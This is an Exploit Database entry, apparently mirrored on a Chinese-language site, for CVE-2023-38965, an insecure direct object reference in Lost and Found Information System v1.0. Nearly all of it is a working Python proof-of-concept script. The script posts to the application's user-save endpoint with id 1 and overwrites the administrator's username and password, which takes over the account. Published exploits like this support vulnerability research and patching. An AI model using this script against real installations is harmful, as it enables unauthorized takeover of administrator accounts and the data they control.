Lost and Found Information System v1.0 – ( IDOR ) leads to Account Take over

• Exploit Database
• 15 阅读

• 作者： Or4nG.M4N
  日期： 2024-02-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51795/

• # Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over 
  # Date: 2023-12-03
  # Exploit Author: OR4NG.M4N
  # Category : webapps
  # CVE : CVE-2023-38965
  
  Python p0c :
  
  import argparse
  import requests
  import time
  parser = argparse.ArgumentParser(description='Send a POST request to the target server')
  parser.add_argument('-url', help='URL of the target', required=True)
  parser.add_argument('-user', help='Username', required=True)
  parser.add_argument('-password', help='Password', required=True)
  args = parser.parse_args()
  
  
  url = args.url + '/classes/Users.php?f=save'
  
  
  data = {
  'id': '1',
  'firstname': 'or4ng',
  'middlename': '',
  'lastname': 'Admin',
  'username': args.user,
  'password': args.password
  }
  
  response = requests.post(url, data)
  if b"1" in response.content:
  print("Exploit ..")
  time.sleep(1)
  print("User :" + args.user + "\nPassword :" + args.password)
  else:
  print("Exploit Failed..")